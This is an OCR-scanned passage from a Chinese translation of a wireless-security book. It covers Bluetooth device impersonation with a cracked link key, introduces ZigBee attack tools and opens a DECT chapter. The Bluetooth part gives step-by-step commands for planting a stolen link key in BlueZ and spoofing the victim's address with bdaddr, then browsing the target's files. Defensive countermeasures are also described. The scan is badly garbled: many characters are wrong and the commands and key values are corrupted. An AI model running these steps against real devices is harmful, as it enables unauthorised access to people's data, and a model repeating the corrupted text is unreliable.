他 的 安全 问题 。 使 用 链接 密 铀 ， 我 们 还 能 够 利用 之 前 的 交换 配对 ， 以 同样 的 权限 访问 授权 设备 上 的 资源 。 


加 防御 通信 数据 包 解 密 


攻击 者 需要 知道 极 微 网 内 的 链接 密 钥 才 能 够 实施 通信 数据 包 解 密 攻 击 。 那 么 防御 PIN 攻击 的 关键 也 在 于 此 。 如 果 收 到 与 手机 
进行 重新 配对 的 请 求 ， 请 不 要 随意 接受 ， 同 时 确保 在 攻击 者 无 法 实施 窃听 攻击 的 地 点 进行 监 牙 配对 。 


罩 ” 仿 造 认证 设备 
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| 国 
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天 


J 
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当 已 经 配对 的 设备 重新 进行 建立 连接 时 ， 保 存 的 链接 密 钥 会 被 用 来 加 密 AU_RAND 挑 战 ， 向 主 、 从 设备 返回 SRES 值 。 因 为 
在 PIN 攻击 中 ， 我 们 可 以 获得 链接 密 铀 ， 所 以 我 们 可 以 伪 委 成 其 中 的 一 个 设备 ， 然 后 与 另 一 个 设备 建立 可 信和 连接 。 


在 这 种 攻击 手段 中 ， 我 们 将 攻击 系统 伪造 成 蓝牙 设备 ， 它 使 用 的 是 盗用 的 链接 密 钥 (受害 者 ) 。 一 旦 伪造 完毕 ， 我 们 融 能 够 
利用 认证 的 访问 权限 利用 另 一 个 配对 设备 (目标 ) 的 漏洞 ， 而 不 需要 与 目标 再 次 进行 配对 。 尽 省 这 个 攻击 能 够 在 多 种 平台 上 进 
行 ， 但 这 里 我 们 选取 Linux 系 统 进行 讲解 。 

提示 。 要 在 其 他 平台 上 实施 这 项 攻击 ， 需 要 能 够 伪造 攻击 目标 的 蓝牙 地 址 ， 同 时 在 本 地 蓝牙 栈 中 添加 盗用 的 链接 密 钥 。 一 份 


包含 蓝牙 栈 以 及 对 应 链接 窗 钥 存储 位 置 的 列表 可 以 在 http://bluetooth- 


pentest.nafod.fu/doc/whete_and_how_bluetooth_stacks_stoting_linkkeys.html 获 取 。 


我 们 继续 使 用 之 前 BTCrack OSS 所 获取 的 链接 密 钥 ， 伪 闭 目 标的 监 牙 地 址 为 00: 11: 9F: C4: F3: AE， 攻击 目标 的 蓝 
地 址 是 00: 60: 57: 1A: 6B: F1。 根 据 BTCrack OSS 的 报告 ， 两 个 设备 使 用 的 链接 密 钥 是 f7: e6: e3: 2c: 1d: 2a: 0b: 
5f: c2: 4c: 41: fa: b5: 30: 8c: b7。 


首先 ， 我 们 在 攻击 平台 上 创建 蓝牙 配对 以 及 链接 密 钥 存储 信息 ， 将 目 身 的 地 址 伪造 成 00: 11: 9F: C4: F3: AE。Linux 上 
的 BlueZ 堆 栈 默认 将 每 个 蓝牙 接口 的 地 址 以 目录 方式 存储 在 /var/lib/bluetooth 下 。 如 下 所 示 。 


3 Sudo su 

4# cd /var/lib/bluetooth 

# mkdir ‘00:11:9F:C4:F3:AFE' 
# cd TO0:1]1:9F:C4:F3:2AE" 


下 一 步 ， 我 们 在 这 个 目录 下 创建 linkkeys 文 件 。 这 个 文件 中 包含 每 次 交换 配对 中 使 用 的 链接 密 钥 ， 一 个 占用 一 行 。 我 们 在 其 
中 以 大 写 形式 指定 攻击 目标 的 蓝牙 地 址 ， 还 有 链接 密 钥 ， 之 后 是 0 4， 如 下 所 示 : 


# cat >>linkkeys 
00:60:57:1A:6B:F1 fieée32cld2a0b5fc24c41fab5308cb7 0 4 


已 


输入 完毕 后 按 Enter ( 回 车 键 ) ， 然 后 按 Ctrl+ D 键 退出 Cat 命令。 


一 旦 链接 密 铀 和 配对 信息 都 创建 完毕 后 ， 我 们 还 需要 修改 攻击 接口 的 蓝牙 地 址 来 进行 伪 丢 。 如 果 使 用 的 是 CSR 必 片 组 的 监 
接口 ， 那 么 我 们 可 以 在 bdaddr 工 具 中 指定 目标 设备 的 监 牙 地 址 来 进行 伪 沪 。 在 大 部 分 的 Liunx 系 统 上 ， 它 并 不 包含 在 Bluzez 的 
发 行 包 中 ， 所 以 需要 安 浴 一 个 编译 环境 ， 然 后 下 载 它 的 代码 ， 手 动 进行 创建 : 


$ SuUdo 3u 

# apt-get install libdbus-l-dev 

# cd /usr/src 

# wget -dq www.kernel .org/pub/linux/bluetooth/bluez—-4.47 .tar.gz 
# tar xfz bluez—-4.47.tar.gz 

# cd bluez-4.47 

# ./configure -~--enable-test 

# make 


编译 好 BlueZ 的 源 代码 之 后 ， 切 换 到 bdaddr 目 录 下 ， 运 行 其 中 的 可 执行 文件 : 


iD 
nn 
[十 


# cd usrAsrecApluez-4.47/tes 
# ./:bdaddr 一 


bdaddr — Utility for changing 七 he Bluetooth device address 
Usage: 
bdaddr |[-1i <dev>|] [-r|] [-t] lInew bdaddr | 


可 以 使 用 bdaddr 工 具 对 受害 者 的 蓝牙 设备 地 址 改变 本 地 接口 进行 ， 改 变 的 效果 立刻 束 能 看 到 |: 


f¥ ./bdaddr -i hci0 -r 00:11:9F:C4:F3:AFE 
Manufacturer: Cambridge Silicon Radio (10) 


Dewvice address: O00:0A:94:01:93:C3 


New BD address: O00:11:9F:C4:F3:AE 
Address changed - Reset device manually 


# hciconfig hci0 
Fer Type: USB 

BD Address: O00:11:9F:C4:F3:AE ACL MTIU: 384:8 SCO MTU: 64: 
UP RUNNING PSCAN 

RX bvytes:101 

TX bytes:419 acl:0) sco:0 commands: 


LL) 


从 hciconfig 显 示 的 结果 中 ， 我 们 可 以 看 到 监 牙 地 址 的 信息 已 经 成 功 改变 了 。 注 意 这 个 赣 牙 地 址 会 一 直 存 在 ,与 Wi-Fi MAC 
地 址 欺骗 不 同 ， 在 移 除 和 插入 事件 友 生 时 ， 蓝 牙 接口 会 一 直 保 留 这 个 地 址 。 如 果 希 望 MAC 地 址 的 改变 只 是 临时 的 (比如 非 永久 
性 的 ) ， 那 么 可 以 在 bdaddr 工 具 的 命令 中 加 入 -t 参 数 。 


在 蓝牙 接口 上 使 用 复制 的 链接 密 钥 认证 结构 和 伪造 的 蓝牙 地 址 后 ， 我 们 现在 可 以 连接 目标 系统 ， 访 问 之 前 配对 设备 可 以 访问 
的 任何 远程 设备 上 的 资源 。 举 例 来 襄 ， 如 果 目 标 设备 运行 有 OBEX 文 件 传输 服务 ， 那 么 我 们 可 以 使 用 类 似 Nautilus (基于 
GNOME 系 统 ) 或 者 Konqueror (基于 KDE-based 系 统 ) 这 样 的 工具 浏览 共享 文件 资源 ， 如 下 图 所 示 。 


File Edt wiew Go Bookmarks Tabs Help 


= EC | 忆 
Forward Reload Heme Computer Search 
[Lacation: |obex:j[00:1B:63:5D:56:6C] 100%% Compact View vw 


PlacesY 802.11ninja.net Documents Mowes 
jwright 2008-Toorcon X | Downloads BB Music 
Desktop Applications FCE 4 Book Files Pictures 

= Flle System 
nto it Chl3Diagrams = harald sa Public 
至 joshua Wh... BD Desktop Library pysolite-2.5.5 


Trash 
"Desktop" selected 


re 


提示 要 在 Ubuntu 系 统 上 增加 对 Nautilus 工 具 的 支持 ， 使 用 命令 sudo apt-get install gnome-vfs-obexftp bluez-compat 人 用 鞘 gnome- 


vfs-obexftp 和 bluez-compat。 


图 防 御 身 份 伪造 攻击 


如 果 攻 击 者 要 伪造 成 一 个 可 信任 的 蓝牙 设备 的 身份 ， 那 么 他 必须 知道 受害 者 的 蓝牙 地 址 和 链接 密 钥 信息 。 这 些 信息 大 部 分 都 
能 从 PIN 破 和 解 攻击 中 获得 。 所 以 防御 PIN 攻 击 的 措施 同样 适用 于 这 里 。 尽 可 能 地 使 用 SSP， 不 要 在 可 能 友 生 窃听 攻击 的 场所 进行 


配对 。 


@ 链接 密 钥 轮换 对 策 


对 抗 设备 伪造 攻击 的 对 策 是 定时 轮换 链接 密 钥 的 值 。 在 典型 的 蓝牙 应 用 中 ， 链 接 密 钥 是 在 设备 配对 过 程 中 建立 的 ， 它 始终 保 
持 不 变 直 到 配对 数据 被 删除 ， 然 后 设备 进行 重新 配对 。 


定时 更 换 链 接 密 钥 可 以 防止 攻击 者 使 用 先前 获取 的 数据 来 伪 妆 成 合法 的 监 牙 设备 。 要 更 换 链接 密 铀 ， 删 除 监 牙 设备 上 的 配对 
信息 ， 然 后 重新 进行 配对 。 人 在 操作 的 时 候 必 须 谨 愤 ， 因 为 配对 过 程 很 容易 受到 攻击 。 请 确保 在 没有 蓝牙 穷 听 攻 击 威胁 的 安全 地 点 
进行 配对 。 


回去 全 简单 配对 对 策 


监 牙 2.1 规 泡 中 引入 的 安全 简单 配对 机 制 束 是 为 了 防止 交换 配对 攻击 ， 从 而 导致 PIN 和 链接 密 钥 的 泄露。 如 果 蓝 牙 设备 中 可 
以 使 用 安全 简 蛙 配对 的 话 ， 那 么 请 使 用 它 来 代 蔡 传统 的 配对 。 


10.2 吴 份 伪造 


监 牙 设备 及 用 多 种 身份 验证 机 制 来 传递 天 于 设备 功能 、 服 务 分 类 、 地 址 以 及 友好 名 称 等 信息 。 根 据 想 要 利用 的 目标 环境 ， 你 
会 上 友 现 通过 修改 攻击 系统 的 身份 对 于 攻击 目标 是 非常 有 帮助 的 。 在 本 节 中 ， 可 以 看 到 如 何 使 用 Linux BlueZ bdaddr 工 具 进 行 伪 
和 妆 ， 修 改 仓储 的 链接 密 铀 。 下 面 我 们 会 讲解 通过 设备 类 别 和 服务 操作 来 复 改 攻击 者 系统 的 监 牙 身份 。 


10.3 ”对 监 才 规 沁 的 错误 使 用 


许多 被 友 现 和 报告 的 监 牙 设备 漏洞 的 成 因 都 人 存 在 于 监 牙 规 泄 的 不 当 使 用 。 在 第 8 章 中 ， 我 们 讲 到 了 多 种 监 牙 及 现 工具 和 
BlueZ sdptool， 它 可 以 浏览 或 者 请 求 目 标 设备 上 的 服务 信息 。 根 据 目 标 设备 的 配置 ， 这 些 服务 中 的 安全 控制 设置 可 能 会 为 攻击 
者 提供 未 授权 的 访问 权限 。 


蓝牙 设备 上 的 某 些 服务 通常 会 要 求 认 证 或 者 加 密 (比如 耳机 或 者 蓝牙 免 提 规 学 ) ， 赣 牙 栈 的 开 友 者 可 能 会 增加 其 他 规范 来 要 
求 更 底层 的 安全 。 举 例 来 说 ， 使 用 对 象 交换 规范 从 远程 设备 接收 一 张 名 片 看 起 来 可 能 并 没有 危险 ， 它 并 不 需要 远程 设备 进行 任何 
认证 ,最 大 程度 地 保证 了 信息 共享 的 简便 性 。 其 他 服务 比如 文件 传输 规范 (File Transfer Profile，FTP) 为 了 简易 性 ， 可 能 也 不 
会 要 求 认证 ， 在 蓝牙 接收 方 发 现 并 扫描 文件 内 容 之 前 ， 它 会 选择 将 所 有 被 传输 的 文件 存放 在 一 个 “隔离 ”的 文件 夹 中 。 


现 蓝牙 规范 中 的 漏洞 ， 攻 击 者 可 以 绕 过 那些 精心 配制 的 安全 措施 ， 造 成 目标 设备 拒绝 服务 ， 或 者 在 受害 者 系统 上 执行 
。 尽 管 历史 上 蓝牙 规范 存在 着 不 少 漏洞 ， 但 是 ， 由 于 移动 手机 的 快速 友 展 ， 这 些 漏洞 的 寿命 都 十 分 短暂 。 在 这 部 分 中 ， 
讲解 那些 已 经 被 修补 的 漏洞 ， 因 为 它们 在 最 新 的 设备 中 几乎 已 经 不 仔 任 了 。 接 下 来 ， 作 者 会 市 领 你 使 用 枚 举 数据 配合 恰 
通过 已 知 或 者 从 前 没有 公开 的 漏洞 入 侵 目 标 设备 。 


10.4 未 来 


到 目前 为 止 ， 攻 击 蓝 牙 规 荡 是 利用 蓝牙 反 术 漏洞 时 最 党 用 的 手段 ， 它 会 出 现在 多 种 蓝牙 设备 上 ， 包 括 传统 的 计算 机 以 及 骨 入 
式 设备 。 这 些 漏洞 的 成 因 听 起 来 有 些 让 人 感到 史 惊 ， 本 书 的 作者 束 好 像 软件 开 友 者 的 时 间 机 器 一 样 。 蓝 牙 栈 的 开 友 者 好 像 回 到 了 


10 年 前 ， 作 者 向 他 们 介绍 软件 中 存在 的 漏洞 ， 这 些 漏洞 在 许多 场合 下 都 已 经 被 确认 和 利用 了 。 尽 管 软件 工业 的 大 部 分 工作 者 对 
于 常见 的 程序 漏洞 和 危险 性 都 有 了 充分 的 认识 ， 并 且 通 过 软件 安全 开 友 周期 (Security Development Lifecycle，SDL) 过 程 减 
少 了 友 生 这 种 攻击 的 机 会 ， 但 是 蓝牙 栈 的 开 友 者 还 在 继续 重复 着 过 去 的 错误 ,将 蓝牙 的 用 尸 暴露 在 攻击 之 下 。 


监 牙 S16G 通 党 会 否认 蓝牙 本 身 存 在 漏洞 ， 将 它们 归结 为 开 友 者 的 失误 。 为 了 维护 他 们 的 权威 ， 蓝 牙 S1G 不 断 开 友 出 新 的 安全 
首 施 来 修补 规范 中 存在 的 漏洞 ， 比 如 最 新 的 蓝牙 2.1 规 学 包括 了 安全 可 靠 配 对 机 制 。 尽 管 我 们 可 以 把 所 有 的 安全 漏洞 都 归结 为 栈 
开 友 者 的 失误 ,但 是 我 们 也 需要 承认 许多 蓝牙 设备 上 的 漏洞 都 是 源 于 蓝牙 协议 本 身 的 复杂 性 。 随 着 蓝牙 3.0 的 友 布 ， 规 范本 身 的 
文档 长 度 束 超 过 了 1700 页 ， 这 还 不 包括 一 些 特定 规范 的 文档 。 


运 今 为 止 ,许多 针对 蓝牙 技术 公开 的 攻击 手段 都 局 限 在 可 友 现 模式 下 的 设备 上 ， 同 时 它们 都 不 需要 认证 束 能 够 进行 漏洞 利 
用 。 与 蓝牙 设备 的 生产 数量 比 起 来 (在 编写 本 书 时 ， 蓝 牙 S1G 报 道 超 过 了 20 亿 ) ， 只 有 其 中 相当 小 的 一 小 部 分 存在 受到 攻击 的 威 
胁 。 攻 击 本 身 的 限制 是 缺少 通用 的 工具 溢出 不 可 友 现 模式 下 的 设备 或 者 修改 低层 的 监 牙 服务 ， 比 如 LMP 服 务 。gr-bluetooth 项 
目的 出 现 打 破 了 这 种 限制 。 现 在 ,攻击 者 能 够 真正 确认 不 可 发 现 模 式 下 蓝牙 设备 的 存在 。 使 用 类 似 的 工具 ， 攻 击 者 还 可 以 在 监 
所 有 的 79 条 FHSS 信 道上 进行 窃听 和 捕获 ， 而 不 需要 预先 知道 网 络 的 结构 、 跳 频 模 式 等 其 他 一 些 极 微 网 特性 。 


对 于 802.11 安 全 来 讲 ， 许 多 驱动 程序 实现 中 的 漏洞 都 是 通过 fuzzing 找 到 的 : 通过 向 目标 发 送 恶意 数据 来 导致 目标 设备 朋 
并。 目前 ,使 用 类 似 的 攻击 手段 并 不 能 够 攻击 低层 的 蓝牙 基 市 或 者 LMP 帧 ; 但 是 ， 这 很 有 可 能 会 在 未 来 友 生 改 变 。 通 过 使 用 gr- 
bluetooth 捕 获 蓝 牙 通 信 数 据 包 ， 攻 击 者 区 有 可 能 传输 任意 形式 的 蓝牙 数据 帧 。LMP 帧 格式 中 存在 多 个 可 以 fuzzing 的 字段 ， 比 
如 类 型 长 度 值 、 空 终止 数据 以 及 可 变 长 度 的 字段 。 所 以 与 802.11 驱 动 程序 一 样 ， 完 全 有 理由 期 待 蓝 牙 栈 中 出 现 类 似 的 驱动 程序 
漏洞 ， 同 时 它们 会 拥有 类 似 的 影响 力 。 


在 编写 本 书 时 ， 安 全 简单 配对 机 制 已 经 公布 了 2 年 多 了 ， 但 是 很 少 有 用 户 在 设备 认证 中 会 使 用 己 。 甚 全 有 些 号 称 文 持 蓝牙 2.1 
规范 的 设备 都 会 限制 用 尸 只 能 采用 传统 的 PIN 认 证 机 制 ， 将 配对 过 程 暴露 在 被 动 窃听 攻击 以 及 PIN 和 链接 密 钥 攻 击 下 。 束 像 前 面 
看 到 的 ， 链 接 密 钥 恢 复 是 一 个 巨大 的 漏洞 ， 攻 击 者 能 够 通过 它 解 密 通 信 数 据 包 并 伪 关 成 一 个 已 认证 的 设备 。 在 安全 简单 配对 协议 
中 还 没有 公布 过 可 以 利用 的 漏洞 ， 所 以 目前 并 没有 对 应 的 漏洞 利用 万 法 。 由 于 安全 简单 配对 协议 并 没有 得 到 广泛 的 使 用 ， 因 此 研 
完 人 员 对 于 友 气 其 中 的 漏洞 也 不 是 很 感 兴趣 ， 因 为 即使 公布 了 漏洞 也 几乎 没有 设备 可 以 进行 利用 。 但 是 ， 时 间 会 证 明 开 友 商 和 用 
尸 是 否 应 该 用 安全 和 们 日 配对 来 代 蔡 传统 的 PIN 认 证 机 制 ， 此 外 在 安全 简单 配对 中 是 否 会 出 现 能 够 被 利用 的 漏洞 。 


随 着 赣 牙 3.0 的 公布 ， 蓝 牙 设备 中 可 以 选择 及 用 媒体 存 取 层 和 物理 层 (蓝牙 AMP) 以 及 IEEE 802.11。 随 着 更 多 的 无 线 心 片 
组 实现 了 集成 化 ， 蓝 牙 和 Wi-Fi 能 够 共存 在 一 个 芯片 上 ， 使 得 AM P 技 术 变 成 可 能 。 蓝 牙 技术 的 优势 是 它 的 接口 连接 能 力 强 并 且 功 
耗 很 低 ， 通 过 与 传统 的 物理 层 和 媒体 人 存 取 层 组 合 ， 当 用 户 需要 传送 大 容量 文件 时 ， 举 例 来 襄 ， 蔓 牙 栈 融 能 够 切换 到 高 速 的 Wi-Fi 
接口 上 ， 减 少 了 数据 交换 所 需要 的 时 间 。 


现 有 的 802.11 分 析 工 具 能 够 容易 地 识别 AMP 技 术 中 的 Wi-Fi 网 络 。 无 线 入 侵 检测 系统 的 开发 商 也 会 加 入 一 些 规 则 来 识别 蓝 
AMP 连 接 ， 使 用 SSID AMP-xx-xx-xx-xx-xx-xx 来 表示 它 ， 其 中 “xx” 代 表 在 AMP 交 换 中 的 Wi-Fi MAC 地 址 的 十 六 进 制 小 写 形 
式 。 同 样 ， 攻 击 者 也 会 将 AMP 网 络 收录 在 沿街 扫描 数据 汇 轧 的 站 点 上 ， 比 如 wigle.net。 


802.11 AMP 网 络 安全 是 建立 在 CCMP 密 文 之 上 的 ， 它 使 用 PMK， 通 过 安全 简单 配对 的 主 密 钥 派 生 而 成 。 


PMK 的 生成 函数 基于 HMAC-SHA-256 加 密 算法 ， 如 果 没 有 更 多 的 密码 学 研究 ， 想 要 攻击 它 几 乎 是 不 可 能 的 。 这 惑 表 示 ， 如 
果 802.11 链 接受 到 攻击 ， 那 么 它 不 会 影响 到 安全 简单 配对 的 主 密 铀 ， 但 是 一 个 受到 攻击 的 蓝牙 链接 会 影响 到 蓝牙 和 AMP 层 。 


不 和 的 是 ， 很 少 有 机 构 会 重视 监 牙 安全 。 在 漏洞 评估 或 者 渗透 测试 中 ， 他 们 通 弟 都 不 会 将 蓝牙 包括 在 内 ， 甚 全 缺少 安全 机 制 
来 限制 那 泽 与 敏感 信息 打交道 的 雇员 。 正 是 由 于 缺少 利益 ， 所 以 市 场 上 没有 商业 化 的 工具 来 监视 和 评估 监 牙 威胁 。 因 为 缺乏 利 
润 ， 所 以 没有 公司 愿意 研究 开 友 这 些 工 具 。 对 于 攻击 者 来 讽 ， 这 是 一 个 天 大 的 好 消息 ， 只 要 机 构 和 开 皮 商 继续 忽略 这 些 威胁 ， 他 


们 融会 继续 深入 挖掘 监 牙 技术 的 漏洞 。 


10.5“ 本章 小 结 


在 本 章 中 ， 根 据 通 过 侦 测 和 扫 接 (第 8 草 ) 获取 的 信息 ， 以 及 穷 听 到 的 蓝牙 通信 数据 包 (第 9 草 ) ， 我 们 着 重 分 析 了 攻击 和 
利用 蓝牙 技术 的 万 法 。 


监 牙 PIN 攻 击 是 通过 在 配对 过 程 中 穷 取 设备 之 间 的 通信 数据 包 实 现 的 。 一 旦 贷 测 到 了 交换 配对 ， 攻 击 束 能 够 对 PIN 实 施暴 力 
攻击 ， 通 常 这 都 能 够 获取 到 大 部 分 的 PIN 值 。 根 据 获 取 的 PIN 值 ， 攻 击 者 还 能 得 到 链接 密 钥 ， 在 接 下 来 的 攻击 中 通过 FTS4BT 这 样 
的 工具 ,攻击 者 又 可 以 使 用 它 解 密 通信 数据 包 或 者 伪 浅 成 任意 一 个 目标 设备 。 


我 们 还 介绍 了 多 种 确认 蓝牙 设备 信息 的 方法 ， 包 括 蓝 牙 地 址 、 服 务 和 设备 类 型 以 及 友好 名 称 信 息 。 通 过 修改 这 些 字段 ， 我 们 
能 够 更 改 远 程 设备 对 攻击 系统 的 认 知 。 在 某 些 时 候 ， 这 是 有 必要 的 ， 比 如 在 iPhone 蓝 牙 浏 哆 器 接口 的 那个 示例 中 ， 我 们 的 设备 
就 出 现在 了 它 的 扫 拉 列 表 中 。 其 他 情况 下 ， 我 们 通过 修改 友好 名 称 这 样 的 信息 来 利用 蓝牙 设备 的 漏洞 。 


最 后 ， 我 们 讲解 了 多 种 攻击 监 牙 规范 的 方法 ， 包 括 利 用 多 种 蓝牙 栈 的 漏洞 。 赣 牙 规范 攻击 并 不 适用 于 所 有 的 蓝牙 设备 ， 尽 管 
目前 它 仍 是 攻击 者 用 来 攻击 赣 牙 技术 时 所 米 用 的 最 广泛 的 攻击 手法 。 


监 牙 技术 对 于 攻击 者 来 说 是 一 个 具有 放 惑 力 的 目标 ， 通 过 利用 它 的 漏洞 ， 攻 击 者 可 以 获取 手机 上 的 敏感 内 容 ， 在 目标 系统 上 
运行 任意 代码 ， 对 蓝牙 耳机 或 者 电脑 实施 远程 穷 听 。 只 要 机 构 对 蓝牙 技术 的 安全 还 不 够 重视 ， 那 么 攻击 者 融会 继续 探索 新 的 方法 
来 攻击 这 个 流行 的 无 线 传输 机 制 |。 


第 11 草 入 侵 ZigBee 


ZigBee 是 一 项 已 经 成 熟 但 是 还 在 不 断 及 展 的 无 绪 技 术 ， 它 应 用 在 多 种 行业 中 ， 这 些 行业 都 要 求 有 简单 的 协议 堆栈 、 小 规 
格 、 低 数据 速率 以 及 较 长 的 电池 寿命 。ZigBee 技 术 由 ZigBee 联 盟 开 友 ， 它 同 其 他 多 种 无 线 反 术 融合 在 一 起 出 现在 各 种 行业 和 家 
寿 应 用 中 ， 从 家 庭 影院 的 遥控 器 到 医院 的 患者 监护 系统 。 


几乎 没有 人 发 布 过 入 侵 ZigBee 网 络 的 工具 和 研究 ， 尽 管 随 着 ZigBee 的 发 展 这 个 状况 可 能 会 发 生 改 变 。 在 本 章 中 ， 我 们 会 讲 
解 ZigBee 推 栈 的 功能 ， 了 解 ZigBee 企 诸多 无 绪 协 议 中 能 占有 一 厚 乙 地 的 原因 。 同 样 我 们 会 讲解 使 用 ZigBee 扩 术 进 行 通信 的 方 
法 。 在 过 去 数 年 中 ，ZigBee 技 术 增 加 了 许多 新 的 功能 和 特性 ， 包 括 更 好 的 安全 升级 ， 我 们 会 在 讲解 ZigBee 堆 栈 的 分 层 结 构 时 对 
它 进行 详细 讲解 。 


在 本 章 中 ， 我 们 还 会 介绍 多 种 攻击 ZigBee 网 络 的 工具 ， 包 括 一 个 专门 用 来 扫 折 和 利用 ZigBee 协 议 的 工具 包 。 我 们 会 搭配 多 
种 工具 的 使 用 ， 逐 步 讲 解 如 何 利 用 ZigBee 设 备 中 的 漏洞 ， 之 后 我 们 还 会 对 高 级 的 ZigBee 攻 击 给 出 指导 ， 可 以 利用 这 些 思 路 来 友 
现 ZigBee 协 议 中 存在 的 新 漏洞 。 


11.1 ZigBee 介 绍 


ZigBee 近 术 为 低 功 耗 无 线 网 络 定义 了 一 系列 标准 ， 许 多 设备 的 电池 寿命 都 能 够 达到 ?5 年。 这 些 节 能 特性 都 源 于 ZigBee 设 计 
中 的 一 些 亮 尽 : 低 数 据 传 输 速 率 、 近 距离 传输 、 加 电 后 不 会 复位 的 网 络 协调 器 和 路 由 器 ， 以 及 一 个 简单 的 协议 扒 枝 集成 在 多 种 片 
上 系统 (System-on-Chip，SoC) 设备 上 ， 整 个 ZigBee 推 栈 、 无 线 传 输 器 和 微 处 理 器 都 集中 在 一 个 集成 电路 上 。 


11.2 ZigBee 安 全 


ZigBee 规 范 使 用 AES 加 密 保护 无 线 通 信 的 机 密 性 和 完整 性 ， 通 过 网 络 密 钥 进 行 设备 和 数据 验证 。 要 满足 ZigBee 设 备 不 同 的 
安全 需求 ，ZigBee 规 学 定义 了 两 种 安全 模式 : 


. 标准 安全 模式 ”以 前 的 名 称 是 住宅 安全 模式 ， 标 准 安 全 模式 使 用 单个 共享 密 钥 提供 ZigBee 节 点 的 认证 ， 信 任 中 心 使 用 访问 
控制 列表 (Access Control List，ACL) 对 设备 进行 认证 。 这 个 模式 对 于 设备 来 说 ， 并 不 占用 太 多 的 资源 ， 因 为 网 络 中 的 每 个 设备 
都 无 需 维 护 一 份 设备 认证 证 书 列表 。 


. 高 安全 模式 ”以 前 称 为 商业 安全 模式 ， 高 安全 模式 要 求 ZigBee 网 络 中 的 一 个 设备 作为 信任 中 心 ， 来 跟踪 网 络 中 使 用 的 所 有 
加 冤 和 认证 客 钥 ， 执 行 网 络 认证 和 冤 钥 升级 。 信 任 中 心 设备 需要 有 足够 的 资源 来 跟踪 网 络 中 使 用 的 认证 证 书 ， 并 且 它 是 整个 
ZigBee 网 络 的 一 个 控制 点 ， 如 果 它 不 能 发 挥 作用 ， 那 么 任何 设备 都 不 允许 加 入 网 络 。 


11.3” ZigBee 攻击 


到 目前 为 止 ， 几 乎 没有 人 公布 过 攻击 和 利用 ZigBee 的 方法 。 只 有 少数 的 几 篇 论文 揭 出 了 IEEE 802.15.4 或 者 ZigBee 本 身 就 存 
在 的 漏洞 ， 但 是 没有 人 公布 过 利用 这 些 漏洞 的 工具 ， 或 者 评估 ZigBee 技 术 的 安全 性 。 


由 于 缺乏 评估 ZigBee 网 络 安全 性 的 工具 和 技术 ， 作 者 决定 目 行 开 友 一 套 攻 击 工具 包 来 帮助 人 们 完成 这 项 工作 。 这 些 内 容 是 
第 一 次 出 现在 本 书 中 ， 所 以 我 们 很 菏 幸 能 够 提供 这 些 资源 ， 帮 助人 们 进一步 探索 ZigBee 撤 术 中 的 安全 设计 理念 以 及 执行 沅 程 。 


11.4 ”攻击 演练 


下 面 我 们 会 讲解 一 种 端 对 端的 ZigBee 攻 击 方 法 ， 它 的 目标 是 ZigBee 自 定义 设备 。 作 者 在 现实 中 的 渗透 测试 中 多 次 采用 了 这 
种 攻击 方法 ， 首 先 假设 我 们 无 法 确认 目标 网 络 的 具体 情况 。 


在 这 种 攻击 方法 中 ， 我 们 利用 了 ZigBee 拉 术 的 男 一 个 普遍 的 弱点 : 物理 安全 。 由 于 ZigBee 技 术 本 身 的 特点 以 及 外 设 的 尺寸 
相对 较 小 ， 盗 取 设 备 融 为 攻击 者 提供 了 绝 佳 的 攻击 机 会 。 对 物理 设备 进行 逆向 工程 随后 攻击 其 他 的 设备 是 完全 可 行 的， 同时 所 面 
临 的 风险 也 是 最 小 的 。 


ZigBee 设 备 的 成 本 都 很 低 ， 所 以 它们 都 不 可 能 及 用 拓 干 扰 措 施 。 攻 击 者 一 旦 盗 取 了 设备 ， 玖 能 够 利用 这 点 打开 ZigBee 无 线 
接口 ， 与 它 或 者 其 他 外 设 进 行 通信 (比如 微 处 理 器 或 者 加 密 加 速 器 ) 。 对 于 许多 最 新 的 ZigBee 无 线 接口 ， 如 果 攻 击 者 能 够 物理 
接触 到 设备 的 话 ， 那 么 他 们 残 可 以 通过 调试 或 者 开 友 者 使 用 的 配置 接口 来 获取 加 密 密 钥 材 料 ， 下 面 你 束 会 看 到 这 种 攻击 方法 。 


11.5 ”本 童 小 结 


ZigBee 是 一 个 快速 友 展 的 低速 、 低 消耗 的 协议 ， 它 应 用 于 多 种 行业 领域 中 ， 比 如 卫生 医疗 、 家 庭 目 动 化 、 智 能 电网 系统 以 
及 安全 系统 中 。ZigBee 拥 有 保护 数据 机 密 性 的 措施 ， 它 使 用 AES 加 密 来 防御 攻击 ，ZigBee 漏 洞 形成 的 原因 在 于 低 成 本 设备 中 的 
功能 十 分 有 限 ， 这 束 会 3 起 穷 听 攻 击 、 序 询 攻 击 (使 用 zbreplay 进 行 重 放 攻击 ) 、 密 钥 攻击 (使 用 zbdsniff 获 取 密 钥 ) 。 


我 们 可 以 使 用 商业 或 者 开源 的 工具 来 评估 ZigBee 技 术 的 安全 性 ， 其 中 KillerBee 工 具 套 件 为 评估 ZigBee 技 术 和 开发 攻击 工具 
提供 了 一 套 人 简单 有 效 的 机 制 。 由 于 常见 的 集成 无 线 接口 和 微 处 理 器 中 都 包含 有 漏洞 ， 因 此 我 们 可 以 使 用 GoodFET 和 zbgoodfind 
工具 来 实施 物理 攻击 。 


随 着 ZigBee 的 应 用 越 来 越 广 泛 ， 它 也 会 逐渐 受到 黑客 和 研究 人 员 的 关注。 尽管 ZigBee 的 一 些 特性 非常 适用 于 某 些 应 用 程 
序 ， 但 是 在 数据 机 密 性 和 完整 性 方面 ,我们 还 是 有 必要 进行 更 深 一 步 的 安全 分 析 来 审核 协议 本 身 的 安全 性 。 


第 12 草 入 侵 DECT 


数字 增强 无 线 通 信和 规范 (Digital Enhanced Cordless Telecommunications，DECT) 是 无 线 电 话 的 全 球 标准 ， 它 广泛 应 
用 于 家 庭 、 小 型 办 公 室 和 企业 中 。DECT 设 备 的 标准 化 和 大 规模 生产 使 得 越 来 越 多 的 消费 者 和 企业 采用 这 项 无 线 技术 用 于 电话 通 
信 以 及 低速 数据 传输 。DECT 在 欧洲 尤为 流行 ， 仪 在 德国 就 有 超过 3100 万 的 DECT 设 备 。 


尽管 DECT 是 一 个 开放 的 标准 ， 但 是 用 来 保护 私密 性 的 安全 算法 细节 并 没有 公开 ， 只 有 授权 的 设备 制造 商 才 能 够 获取 它们 。 
因此 ， 任 何 使 用 DECT 技 术 的 非 登 利 性 机 构 都 无 法 研究 这 些 安全 机 制 。 最 终 由 于 DECT 的 安全 机 制 缺少 同行 评审 和 分 析 导 致 了 它 
的 衰 洛 ， 随 后 融 出 现 了 多 种 攻击 和 漏洞 利用 工具 。 


